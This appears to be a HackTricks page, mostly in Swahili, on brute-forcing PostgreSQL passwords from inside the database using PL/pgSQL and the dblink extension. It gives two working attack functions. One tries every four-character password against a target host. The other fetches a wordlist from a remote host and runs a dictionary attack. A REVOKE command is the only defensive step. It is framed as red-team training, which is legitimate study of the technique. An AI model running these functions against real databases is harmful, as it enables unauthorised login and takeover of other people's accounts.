PL/pgSQL Password Bruteforce

Reading time: 4 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Find more information about these attack in the original paper.

PL/pgSQL ni lugha ya programu iliyo na vipengele vyote ambayo inapanua uwezo wa SQL kwa kutoa udhibiti wa taratibu ulioimarishwa. Hii inajumuisha matumizi ya mizunguko na muundo mbalimbali wa udhibiti. Kazi zilizoundwa katika lugha ya PL/pgSQL zinaweza kuitwa na taarifa za SQL na vichocheo, na kupanua wigo wa operesheni ndani ya mazingira ya hifadhidata.

Unaweza kutumia lugha hii ili kuomba PostgreSQL ikamilishe nguvu za nywila za watumiaji, lakini lazima iwepo kwenye hifadhidata. Unaweza kuthibitisha uwepo wake kwa kutumia:

sql
SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+---------
plpgsql |

Kwa default, kuunda kazi ni haki inayotolewa kwa PUBLIC, ambapo PUBLIC inarejelea kila mtumiaji kwenye mfumo huo wa database. Ili kuzuia hili, msimamizi angeweza kuwa na jukumu la kubatilisha haki ya USAGE kutoka kwenye eneo la PUBLIC:

sql
REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;

Katika kesi hiyo, ombi letu la awali lingetoa matokeo tofauti:

sql
SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
lanname | lanacl
---------+-----------------
plpgsql | {admin=U/admin}

Kumbuka kwamba ili skripti ifanye kazi kazi dblink inahitaji kuwepo. Ikiwa haipo unaweza kujaribu kuunda hiyo na

sql
CREATE EXTENSION dblink;

Password Brute Force

Hapa kuna jinsi unavyoweza kufanya bruteforce ya nywila ya herufi 4:

sql
//Create the brute-force function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
DECLARE
word TEXT;
BEGIN
FOR a IN 65..122 LOOP
FOR b IN 65..122 LOOP
FOR c IN 65..122 LOOP
FOR d IN 65..122 LOOP
BEGIN
word := chr(a) || chr(b) || chr(c) || chr(d);
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;
EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection
THEN
-- do nothing
END;
END LOOP;
END LOOP;
END LOOP;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql';

//Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');

Note that even brute-forcing 4 characters may take several minutes.

Unaweza pia kupakua orodha ya maneno na kujaribu tu nywila hizo (shambulio la kamusi):

sql
//Create the function
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
username TEXT, dbname TEXT) RETURNS TEXT AS
$$
BEGIN
FOR word IN (SELECT word FROM dblink('host=1.2.3.4
user=name
password=qwerty
dbname=wordlists',
'SELECT word FROM wordlist')
RETURNS (word TEXT)) LOOP
BEGIN
PERFORM(SELECT * FROM dblink(' host=' || host ||
' port=' || port ||
' dbname=' || dbname ||
' user=' || username ||
' password=' || word,
'SELECT 1')
RETURNS (i INT));
RETURN word;

EXCEPTION
WHEN sqlclient_unable_to_establish_sqlconnection THEN
-- do nothing
END;
END LOOP;
RETURN NULL;
END;
$$ LANGUAGE 'plpgsql'

-- Call the function
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks